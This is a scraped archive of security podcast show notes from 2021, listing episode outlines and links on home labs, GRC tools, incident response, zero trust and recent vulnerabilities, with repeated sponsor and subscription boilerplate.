Thought we’d put in a little news to round out the show
https://www.bbc.com/news/world-us-canada-58863678 - nuclear secrets hidden in a peanut butter sandwich
https://www.theregister.com/2018/04/20/rsa_security_conference_insecure_mobile_app/
https://www.vice.com/en/article/jg8w9b/the-twitch-hack-is-worse-for-streamers-than-for-twitch
https://www.securityweek.com/fontonlake-linux-malware-used-targeted-attacks
Similar device on ebay: https://www.ebay.com/itm/324762812721
https://www.zdnet.com/article/brewdog-exposed-data-of-200000-shareholders-for-over-a-year/
https://tpetersonkth.github.io/cve/2021/10/02/Analysis-of-CVE-2019-9053.html
www.leanpub.com/avatar2 MSRP = $30 USD
Book changes
What is the end goal?
Upskill?
Independent consultant?
Promotion?
Bug bounties?
Lab setup -
Lab setup types
Cloud based -
Desktop/laptop/NUC -
Server -
Good VMs to
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ - 90 day WIndows machines
What other home lab equipment have would be helpful?
Testing IoT/embedded devices?
Car hacking?
Malware analysis?
https://bazaar.abuse.ch/
Virus Total Intelligence
Honeypots
@malware_traffic - https://twitter.com/malware_traffic/status/1446627364147023877
Analyzing binaries?
Patch analysis (patch tuesday, print nightmare, etc)?
https://wumb0.in/extracting-and-diffing-ms-patches-in-2020.html
https://www.netresec.com/?page=networkminer
Soldering?
Oscillators for voltage checks?
Wireless?
Old cellphones (mobile apps, don’t need cellular)
Personal assistant devices (used IoT devices?)
Accessing data stored on devices
Specific software licenses?
Burp?
If I’m trying to break into infosec, how do I use my lab to sell myself to an employer?
Does the employer care?
How can someone show what they’ve learned in a way that shows the value?
Published on: October 14, 20212021-035-GRC selection discussion, TechSecChix, and the 'job description problem'
GRC tools (Governance Risk and Compliance)
@ki_twyce_
@TechSecChix
INfosec unplugged
Security Happy Hour
Eric’s cyberpoppa show
Cyber Insight show - cohost
Blumira is hiring
https://www.blumira.com/careers/
https://www.cio.com/article/3206607/what-is-grc-and-why-do-you-need-it.html
https://www.oxial.com/all/how-to-go-about-choosing-your-grc-solution/
Why do we need a GRC tool?
https://resilience.acoss.org.au/the-six-steps/managing-your-risks/risk-register
What are our business goals? (to make money... :D )
Are we mature enough to be measuring ourselves?
How can we use this to be more efficient?
https://www.standardfusion.com/blog/the-future-of-grc-7-things-to-look-out-for/
- Centralized Controls. ...
- Support for Future Standards. ...
- Automation
- Integrations (my add… helpdesk integrations, 3rd party)
- Scalability. ...
- Customizable Reporting. ...
- Flexibility. ...
- Task Delegation
GRC tool use in other areas
IT - makes more informed budget decisions, determines directions in business goals, asset mgmt
Finance - Make better financial decisions, profitability
Infosec- vuln mgmt,
Compliance
HR - determine hiring requirements
Legal - ensures ethical management of the organization, reduces breach,
How do you implement GRC?
https://www.crowe.com/insights/6-steps-for-a-successful-grc-implementation
- Step 0: everyone’s input and use cases
- Determine the total value gained by using a centralized GRC platform
- Missing data
- Duplicate processes
- Duplicate data
- Manual steps that can be removed or automated
- Workflows to assist heavily manual areas such as communications, emails, approvals, and reporting
- Identify operational gaps to prioritize the areas you need to improve.
- Get your team on board with an effectively communicated plan.
- Build a strong foundation to support your GRC program
- Deploy a standardized GRC implementation across the board.
- Let the GRC framework evolve and grow after it's implemented.
Published on: September 29, 2021
2021-034-Khalilah Scott, good GRC tool practices - part1
GRC tools (Governance Risk and Compliance)
@ki_twyce_
@TechSecChix
INfosec unplugged
Security Happy Hour
Eric’s cyberpoppa show
Cyber Insight show - cohost
Blumira is hiring
https://www.blumira.com/careers/
https://www.cio.com/article/3206607/what-is-grc-and-why-do-you-need-it.html
https://www.oxial.com/all/how-to-go-about-choosing-your-grc-solution/
Why do we need a GRC tool?
https://resilience.acoss.org.au/the-six-steps/managing-your-risks/risk-register
What are our business goals? (to make money... :D )
Are we mature enough to be measuring ourselves?
How can we use this to be more efficient?
https://www.standardfusion.com/blog/the-future-of-grc-7-things-to-look-out-for/
- Centralized Controls. ...
- Support for Future Standards. ...
- Automation
- Integrations (my add… helpdesk integrations, 3rd party)
- Scalability. ...
- Customizable Reporting. ...
- Flexibility. ...
- Task Delegation
GRC tool use in other areas
IT - makes more informed budget decisions, determines directions in business goals, asset mgmt
Finance - Make better financial decisions, profitability
Infosec- vuln mgmt,
Compliance
HR - determine hiring requirements
Legal - ensures ethical management of the organization, reduces breach,
How do you implement GRC?
https://www.crowe.com/insights/6-steps-for-a-successful-grc-implementation
- Step 0: everyone’s input and use cases
- Determine the total value gained by using a centralized GRC platform
- Missing data
- Duplicate processes
- Duplicate data
- Manual steps that can be removed or automated
- Workflows to assist heavily manual areas such as communications, emails, approvals, and reporting
- Identify operational gaps to prioritize the areas you need to improve.
- Get your team on board with an effectively communicated plan.
- Build a strong foundation to support your GRC program
- Deploy a standardized GRC implementation across the board.
- Let the GRC framework evolve and grow after it's implemented.
Published on: September 29, 2021
2021-033-Kim_Crawley, 8 steps to better security-Part2
8 Steps to Better Security: A Simple Cyber Resilience Guide to Business is done all final editing and will be published by @WileyTech on October 5th.
Pre-orders are available now via Amazon, Barnes & Noble, and other retailers.
Sponsored Link: https://amzn.to/3k3pDAN
Amazon teaser:
“Harden your business against internal and external cybersecurity threats with a single accessible resource.
In 8 Steps to Better Security: A Simple Cyber Resilience Guide for Business, cybersecurity researcher and writer Kim Crawley delivers a grounded and practical roadmap to cyber resilience in any organization. Offering you the lessons she learned while working for major tech companies like Sophos, AT&T, BlackBerry Cylance, Tripwire, and Venafi, Crawley condenses the essence of business cybersecurity into eight steps.
Written to be accessible to non-technical businesspeople as well as security professionals, and with insights from other security industry leaders, this important book will walk you through how to:
- Foster a strong security culture that extends from the custodial team to the C-suite
- Build an effective security team, regardless of the size or nature of your business
- Comply with regulatory requirements, including general data privacy rules and industry-specific legislation
- Test your cybersecurity, including third-party penetration testing and internal red team specialists
Perfect for CISOs, security leaders, non-technical businesspeople, and managers at any level, 8 Steps to Better Security is also a must-have resource for companies of all sizes, and in all industries.
“
Published on: September 20, 2021SPONSOR: Blumira's Patrick Garrity
Blumira-
Per crunchbase:
“Blumira's end-to-end platform offers both automated threat detection and response, enabling organizations of any size to more efficiently defend against cybersecurity threats in near real-time. It eases the burden of alert fatigue, complexity of log management and lack of IT visibility. Blumira's cloud SIEM can be deployed in hours with broad integration coverage across cloud, endpoint protection, firewall and identity providers including Office 365, G Suite, Crowdstrike, Okta, Palo Alto, Cisco FTD and many others.”
Contact [email protected]
Patrick Garrity, VP of Operations.
Patrick has years of experience in the security industry building and scaling usable security products. He currently leads Blumira’s product, sales and marketing teams. Prior to joining Blumira, he led sales engineering, product marketing and international expansion for Duo Security.
Twitter = @Thisisnottap
https://www.ibm.com/cloud/blog/top-5-advantages-of-software-as-a-service
https://www.outsource2india.com/software/articles/software-as-a-service.asp
5 Advantages of SaaS
Reduced time to benefit. Software as a service (SaaS) differs from the traditional model because the software (application) is already installed and configured. ...
Lower costs. ...
Scalability and integration. ...
New releases (upgrades) ...
Easy to use and perform proof-of-concepts.
5 Disadvantages of SaaS
Insufficient Data Security.
SaaS-based application model.
Difficulty with Regulations Compliance.
Cumbersome Data Mobility.
Low Performance.
Troublesome Software Integration.
Limit Attack Surface
https://www.wallix.com/blog/top-10-ways-to-limit-attack-surface
https://www.okta.com/identity-101/what-is-an-attack-surface/
https://securityscorecard.com/blog/what-is-cyber-attack-surface-management
2021-032--Author_Kim_crawley-8-Simple_Rules_for_Cybersecurity
8 Steps to Better Security: A Simple Cyber Resilience Guide to Business is done all final editing and will be published by @WileyTech on October 5th.
It is available now via Kindle.
Pre-orders are available now via Amazon, Barnes & Noble, and other retailers.
Sponsored Link: https://amzn.to/3k3pDAN
Amazon teaser:
“Harden your business against internal and external cybersecurity threats with a single accessible resource.
In 8 Steps to Better Security: A Simple Cyber Resilience Guide for Business, cybersecurity researcher and writer Kim Crawley delivers a grounded and practical roadmap to cyber resilience in any organization. Offering you the lessons she learned while working for major tech companies like Sophos, AT&T, BlackBerry Cylance, Tripwire, and Venafi, Crawley condenses the essence of business cybersecurity into eight steps.
Written to be accessible to non-technical businesspeople as well as security professionals, and with insights from other security industry leaders, this important book will walk you through how to:
- Foster a strong security culture that extends from the custodial team to the C-suite
- Build an effective security team, regardless of the size or nature of your business
- Comply with regulatory requirements, including general data privacy rules and industry-specific legislation
- Test your cybersecurity, including third-party penetration testing and internal red team specialists
Perfect for CISOs, security leaders, non-technical businesspeople, and managers at any level, 8 Steps to Better Security is also a must-have resource for companies of all sizes, and in all industries.
Published on: September 14, 20212021-031- back in the saddle, conference discussion, company privacy
"bel paese, ma più caldo del buco del culo di Satana"
https://www.theverge.com/22648265/apple-employee-privacy-icloud-id
https://mysudo.com/
www.log-md.com
@infosystir
@bryanbrake
@brakesec
@hackershealth
@boettcherpwned
Published on: September 3, 2021
2021-030-incident response, business goal alignment, showing value in IR -p2
https://blog.teamascend.com/6-phases-of-incident-response
https://www.securitymetrics.com/blog/6-phases-incident-response-plan
Recent vulnerabilities got Bryan thinking about incident response.
Are organizations speedy enough to keep up?
If the spate of vulns continue, what can we do to ensure we are dealing with the most important issues?
How do we communicate those issues to management?
How should we handle the workload?
Testing of your IR costs money, do you have budget for that? (verodin, red-team)
Restoring backups, extra VPC or azure environment
Incidents occur
You have to minimize issues, right? But is there a good way of doing that?
Simplify your environment?
Spend time working on the CIS 20? You gotta plan for that and show value vs effort.
Incident response is an ever changing landscape.
What is the goal of IR?
Minimize damage
Identify affected systems
Recover gracefully and quickly?
Does your environment allow for quick recovery?
What does ‘return to normal’ look like?
The goal of business
Make money
Incidents should just be considered part of doing business (risks)
The more popular, the more likely the attack
Incident timeframe = criteria for getting back to normal.
PICERL is a cycle, and one of continual improvement. Incident response is not ‘one and done’.
Published on: August 22, 20212021-029- incident response, PICERL cycle, showing value in IR, aligning with business goals -p1
https://blog.teamascend.com/6-phases-of-incident-response
https://www.securitymetrics.com/blog/6-phases-incident-response-plan
Recent vulnerabilities got Bryan thinking about incident response.
Are organizations speedy enough to keep up?
If the spate of vulns continue, what can we do to ensure we are dealing with the most important issues?
How do we communicate those issues to management?
How should we handle the workload?
Testing of your IR costs money, do you have budget for that? (verodin, red-team)
Restoring backups, extra VPC or azure environment
Incidents occur
You have to minimize issues, right? But is there a good way of doing that?
Simplify your environment?
Spend time working on the CIS 20? You gotta plan for that and show value vs effort.
Incident response is an ever changing landscape.
What is the goal of IR?
Minimize damage
Identify affected systems
Recover gracefully and quickly?
Does your environment allow for quick recovery?
What does ‘return to normal’ look like?
The goal of business
Make money
Incidents should just be considered part of doing business (risks)
The more popular, the more likely the attack
Incident timeframe = criteria for getting back to normal.
PICERL is a cycle, and one of continual improvement. Incident response is not ‘one and done’.
Published on: August 15, 20212021-028-Rebekah Skeete - social engineering techniques and influences
BlackGirlsHack was created to share knowledge and resources to help black girls and women breakthrough barriers to careers in information security and cyber security. The vision for Black Girls Hack (BGH) is to provide resources, training, mentoring, and access to black girls and women and increase representation and diversity in the cyber security field and in the executive suites.
Rebekah Skeete CyberBec @rebekahskeete
Tennisha Martin ~@misstennish
https://www.twitter.com/blackgirlshack - black girls hack
https://www.twitter.com/thefluffy007 - jasmine jackson
Background
https://hitz.com.my/trending/trending-on-hitz/people-that-walk-fast-are-reported-to-be-less-happ
Vegas conference - Blacks in Cyber Village
https://forum.defcon.org/node/236946
https://www.blacksincyberconf.com/bic-village
https://www.youtube.com/c/BlacksInCybersecurity
https://www.blacksincyberconf.com/ctf
https://en.wikipedia.org/wiki/Blind_men_and_an_elephant
https://fuzzcon.forallsecure.com/
https://www.dianainitiative.org/
Social Engineering topics
Misophonia - or phonophobic
https://www.washingtonpost.com/national/health-science/misophonia-is-a-newly-identified-condition-for-people-hypersensitive-to-sound/2014/12/01/7c392782-69ba-11e4-a31c-77759fc1eacc_story.html
https://thecyberwire.com/podcasts/8th-layer-insights
https://terranovasecurity.com/examples-of-social-engineering-attacks/
How all either are directly influenced by.
News, and cool links to read.
SE write-up of a legitimate company (archive.org)
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: August 8, 20212021-027-Black Girls Hack COO Rebekah Skeete!
BlackGirlsHack was created to share knowledge and resources to help black girls and women breakthrough barriers to careers in information security and cyber security. The vision for Black Girls Hack (BGH) is to provide resources, training, mentoring, and access to black girls and women and increase representation and diversity in the cyber security field and in the executive suites.
Rebekah Skeete CyberBec @rebekahskeete
Tennisha Martin ~@misstennish
https://www.twitter.com/blackgirlshack - black girls hack
https://www.twitter.com/thefluffy007 - jasmine jackson
Background
https://hitz.com.my/trending/trending-on-hitz/people-that-walk-fast-are-reported-to-be-less-happ
Vegas conference - Blacks in Cyber Village
https://forum.defcon.org/node/236946
https://www.blacksincyberconf.com/bic-village
https://www.youtube.com/c/BlacksInCybersecurity
https://www.blacksincyberconf.com/ctf
https://en.wikipedia.org/wiki/Blind_men_and_an_elephant
https://fuzzcon.forallsecure.com/
https://www.dianainitiative.org/
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: August 2, 2021
2021-026-Triaging threat research, Jira vulns, Serious Sam vuln, Systemd vulns, and HiveNightmare
https://www.mindtools.com/pages/article/newHTE_95.htm
https://www.infoq.com/news/2021/07/microsoft-linux-builder-mariner/
https://www.productplan.com/glossary/action-priority-matrix/
More PrintNightmare issues:
https://www.bleepingcomputer.com/news/microsoft/windows-10-july-security-updates-break-printing-on-some-systems/
“"After installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices that are not compliant with section 3.2.1 of RFC 4556 spec might fail to print when using smart card (PIV) authentication," Microsoft explained.”
https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/
“Shlayer, discovered in 2018, is constantly maintained and also evolving. The graph below is representative of Shlayer continually being a go-to piece of malware that attackers use to compromise the victim’s machine. We observed an uptick in Shlayer detections occurring before the release of CVE-2021-30657 (the Gatekeeper bypass) that was being exploited by Shlayer. This vulnerability was subsequently patched on April 26, 2021.”
https://www.zdnet.com/article/nasty-linux-systemd-security-bug-revealed/
https://access.redhat.com/security/cve/cve-2021-33910
“It works by enabling attackers to misuse the alloca() function in a way that would result in memory corruption. This, in turn, allows a hacker to crash systemd and hence the entire operating system. Practically speaking, this can be done by a local attacker mounting a filesystem on a very long path. This causes too much memory space to be used in the systemd stack, which results in a system crash.”
There's no way to remedy this problem. While it's not present in all current Linux distros, you'll find it in most distros such as the Debian 10 (Buster) and its relatives like Ubuntu and Mint. Therefore, you must, if you value keeping your computers working, patch your version of systemd as soon as possible. You'll be glad you did.
https://redmondmag.com/articles/2021/07/21/serioussam-windows-flaw.aspx
https://securityaffairs.co/wordpress/120576/security/apple-cve-2021-30807-zero-day.html?
https://github.com/GossiTheDog/HiveNightmare
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: July 28, 20212021-025-Dan Borges, Author of Adversarial Techniques from Packt Publishing
Dan Borges - Author @1njection
Cool near real time updates on the hack: https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://twitter.com/DAlperovitch/status/1412033278081708034
https://github.com/ahhh/Cybersecurity-Tradecraft/tree/main/
https://www.amazon.com/Network-Attacks-Exploitation-Matthew-Monte/dp/1118987128
https://en.wikipedia.org/wiki/Best_response
https://labs.bishopfox.com/tech-blog/sliver
https://www.amazon.com/Rootkits-Bootkits-Reversing-Malware-Generation/dp/1593277164
Virtual CCDC:
How easy was the process working with Packt?
Did they approach you or vice versa?
5 D's of Physical Security
The five D's of security seek to do one or more of the following: Deter, Detect, Delay, Deny and Defend.
https://www.securitymagazine.com/articles/82833-the-5-ds-of-outdoor-perimeter-security
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: July 19, 20212021-024-Dan Borges, Author of Adversarial Techniques from Packt Publishing
Dan Borges - Author @1njection
Cool near real time updates on the hack: https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
https://twitter.com/DAlperovitch/status/1412033278081708034
https://github.com/ahhh/Cybersecurity-Tradecraft/tree/main/
https://www.amazon.com/Network-Attacks-Exploitation-Matthew-Monte/dp/1118987128
https://en.wikipedia.org/wiki/Best_response
https://labs.bishopfox.com/tech-blog/sliver
https://www.amazon.com/Rootkits-Bootkits-Reversing-Malware-Generation/dp/1593277164
Virtual CCDC:
How easy was the process working with Packt?
Did they approach you or vice versa?
5 D's of Physical Security
The five D's of security seek to do one or more of the following: Deter, Detect, Delay, Deny and Defend.
https://www.securitymagazine.com/articles/82833-the-5-ds-of-outdoor-perimeter-security
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: July 10, 2021
2021-023-d3fend framework, DLL injection types, more solarwinds infections
Pihole setup
Conference talk
https://securityaffairs.co/wordpress/119425/apt/solarwinds-nobelium-ongoing-campaign.html
https://www.ehackingnews.com/2021/06/attackers-pummelled-gaming-industry.html
https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows
https://www.theregister.com/2021/06/15/zoll_defibrillator_dashboard_vulnerabilities/
https://www.ionos.com/digitalguide/server/configuration/winsxs-cleanup/
https://www.customink.com/fundraising/mental-health-hackers-7816
Buy @infoseccampout tickets: https://www.eventbrite.com/e/infosec-campout-2021-tickets-157561790557
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: June 30, 20212021-022-github policy updates targeting harmful software, Ms. Berlin discusses WWHF, CVSS discussion
Ms. Berlin’s conference report WWFH (reno, NV)
Her next appearances will be at Defcon 2021 and BlueTeam Con 2021!
https://www.infosecurity-magazine.com/news/amazon-prime-day-phishing-deluge/
https://www.ehackingnews.com/2021/06/threat-actors-use-google-drives-and.html
https://www.kennasecurity.com/blog/vulnerability-score-on-its-own-is-useless/
https://github.blog/2021-04-29-call-for-feedback-policies-exploits-malware/
https://github.com/github/site-policy/pull/397
https://twitter.com/vm_call/status/1405937492642123782?s=20
https://thenewstack.io/cvss-struggles-to-remain-viable-in-the-era-of-cloud-native-computing/
ZOMG BUY SHIRTS HERE
https://www.customink.com/fundraising/mental-health-hackers-7816
Buy @infoseccampout tickets: https://www.eventbrite.com/e/infosec-campout-2021-tickets-157561790557
Check out our Store on Teepub! https://brakesec.com/store
Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected]
#AmazonMusic: https://brakesec.com/amazonmusic
#Spotify: https://brakesec.com/spotifyBDS
#Pandora: https://brakesec.com/pandora
#RSS: https://brakesec.com/BrakesecRSS
#Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon
https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
Published on: June 22, 20212021-021-Security Sphynx, ZeroTrust, implementation prep- part2
EO from President Biden asked for a plan to create Zerotrust implementation in the next 90 days (well, 70ish days now… as of 23 May)
https://twitter.com/SecuritySphynx/status/1390475868032618496
@securitySphynx
“CIO: Zero Trust is the way…”
What is the optimal configuration (read: easiest) zero trust config?
Are there different ways to implement Zero Trust?`
https://solutions.pyramidci.com/blog/posts/2021/february/the-swiss-cheese-approach/
https://tulsaworld.com/opinion/columnists/zero-trust-security-assume-that-everyone-and-everything-on-the-internet-is-out-to-get/article_f6bdbfad-1aae-5063-8ac0-6a1faf5a244c.html
https://www.reddit.com/r/devops/comments/bqo6kp/open_source_or_cheap_zero_trust_beyondcorp/
https://opensource.com/article/17/6/4-easy-ways-work-toward-zero-trust-security-model
https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v1.1(U)_Mar21.pdf
What is ZTA?
Who are your users?
What Devices in use?
Device attestation/health checks
Applications exist?
Connections exist?
Not just into/out of the traditional LAN network - do you understand dependencies of applications and databases and how the traffic flows?
Where is the data/traffic? coming from? Going to?
When is this activity occurring and what is expected?
WHY: Need to balance the access to technical resources in a rapidly evolving and dynamic business landscape that ceases to exist within the confines of normal security perimeters.
Mobile workforce - how much work can you get done without ever getting on the VPN?
Blockers
Technical Debt
IT Hygiene
Zero Trust REQUIRES the pre-work of establishing baselines. You cannot detect abnormality in the absence of normality.
Policy should exist to drive what the specifications of a baseline system, server, application, etc will be.
Network traffic, endpoint performance, SIEM tuning, endpoint agent/software accountability
ZTA is less useful if you're not doing basic patching, application updates, and allowing local admin on the system level).
Legacy Systems:
Not designed with this approach in mind, and often costly to modernize.
Asset Management
Where are your assets and how are they used? A “rough estimate” of endpoints is never good enough.
What are you logging? What AREN’T you logging?
User rights auditing
Stale accounts, service accounts, HR Workflows for onboarding/offboarding
Limitations of admin rights
Local admin/password expiration issues for sales/travelling employees
Human resources/talent
Politics: Getting support/$$$/Buy-in for retrofitting applications that are “working just fine” is a huge political/business hurdle.
Where to go from here:
SaaS/PaaS/etc offerings
What can you move from traditional off-prem solutions to cloud-based services (more up to date, regularly reviewed for security vulnerabilities, offloading responsibility of maintenance, SSO capabilities)
AAA requirements
MFA is a MUST. No, it's not perfect, but it is one more layer in efficacy.
Have discussions around REAL RBAC needs BEFORE implementing a solution. It is easier to expand permissions than it is to take them away. Resist the idea that the easy button of broad stroke permissions is always the right choice.
Identify data owners, make them responsible for RBAC development with technical departments.
Quantify risk associated with mishandled resources for crown jewels (see previous section on politics).
Change control around permissions, access
Security as an active participant in the development/acquisition of new products, software, services, or organizations Like remodeling a house, it is much easier to build security into the process than hire someone to retrofit it later..
What auditing are you doing? Have you baselined behavior? Where are your logs going, and WHO IS RESPONSIBLE FOR REVIEWING THEM.
Manage the Endpoint: Stop thinking about the perimeter as your weakest point. The endpoint is critical and increasingly vulnerable, mobile, out of traditional “control”. Real time, actionable data and capabilities are critical to remediation and progress.
Asset Inventory (again)... Then…
HIDS/Firewall
Patch
Applocker/Application Controls
Lather, rinse, repeat.
DLP Classification
It’s hard, it’s time-consuming, and it requires a LOT of support for business unit owners.
Capture metrics, then set KPIs and regular check ins to reduce MTTP/MTTR/MTTD
Would you like to know more?
https://www.beyondtrust.com/blog/entry/why-zero-trust-is-an-unrealistic-security-model
2021-020: Security Sphynx, Preparing for ZeroTrust implementation - Part1
Full show notes are available here: https://docs.google.com/document/d/14dCpXeQ520IcZC3m007zVPhlIPXKgfv0LkqVnbDx0fc/edit?usp=sharing
EO from President Biden asked for a plan to create Zerotrust implementation in the next 90 days (well, 70ish days now… as of 23 May)
https://twitter.com/SecuritySphynx/status/1390475868032618496
@securitySphynx
“CIO: Zero Trust is the way…”
What is the optimal configuration (read: easiest) zero trust config?
Are there different ways to implement Zero Trust?`
https://solutions.pyramidci.com/blog/posts/2021/february/the-swiss-cheese-approach/
https://www.reddit.com/r/devops/comments/bqo6kp/open_source_or_cheap_zero_trust_beyondcorp/
https://opensource.com/article/17/6/4-easy-ways-work-toward-zero-trust-security-model
https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v1.1(U)_Mar21.pdf
- What is ZTA
-
- Who are your users?
- Devices in use?
-
- Device attestation/health checks
- Applications exist?
- Not just into/out of the traditional LAN network - do you understand dependencies of applications and databases and how the traffic flows?
- Connections exist?
- What
- Where is the data/traffic? coming from? Going to?
- When is this activity occurring and what is expected?
- WHY: Need to balance the access to technical resources in a rapidly evolving and dynamic business landscape that ceases to exist within the confines of normal security perimeters.
- Who are your users?
Mobile workforce - how much work can you get done without ever getting on the VPN?
- Blockers
- Technical Debt
-
-
- IT Hygiene
-
- Zero Trust REQUIRES the pre-work of establishing baselines. You cannot detect abnormality in the absence of normality.
-
- Policy should exist to drive what the specifications of a baseline system, server, application, etc will be.
- Network traffic, endpoint performance, SIEM tuning, endpoint agent/software accountability
